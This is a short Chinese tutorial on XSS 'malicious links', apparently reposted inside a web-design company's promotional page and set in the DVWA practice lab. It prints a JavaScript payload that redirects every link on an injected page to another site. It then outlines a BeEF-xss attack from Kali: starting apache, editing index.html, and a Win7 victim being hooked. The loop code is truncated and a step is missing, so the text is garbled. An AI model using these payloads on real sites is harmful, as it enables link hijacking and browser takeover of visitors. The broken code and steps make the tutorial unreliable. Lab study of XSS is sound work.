大橙子网站建设,新征程启航
为企业提供网站建设、域名注册、服务器等服务
这篇文章给大家介绍XSS漏洞的恶意链接是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
让客户满意是我们工作的目标,不断超越客户的期望值来自于我们对这个行业的热爱。我们立志把好的技术通过有效、简单的方式提供给客户,将通过不懈努力成为客户在信息化领域值得信任、有价值的长期合作伙伴,公司提供的服务项目有:国际域名空间、雅安服务器托管、营销软件、网站建设、椒江网站维护、网站推广。
一、环境:DVWA
二、修改网页链接
1、点击下面的网址,访问的是不同的内容
2、通过xss漏洞,修改这些网址都指向百度
window.onload:当窗口加载时,执行匿名函数
window.onload=function(){
var link=document.getElementsByTagName("a");
for(j=0;j link[j].href="https://www.baidu.com"; } } 3、在漏洞处输入上面代码,提交 三、生成恶意链接(kali攻击,win7被攻击) 1、kali启动beff-xss 2、启动apache服务:service apache2 start 3、cd /var/www/html 修改index.html 5、被控端上线。 关于XSS漏洞的恶意链接是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
名称栏目:XSS漏洞的恶意链接是怎样的
链接地址:http://dzwzjz.com/article/jejjoe.html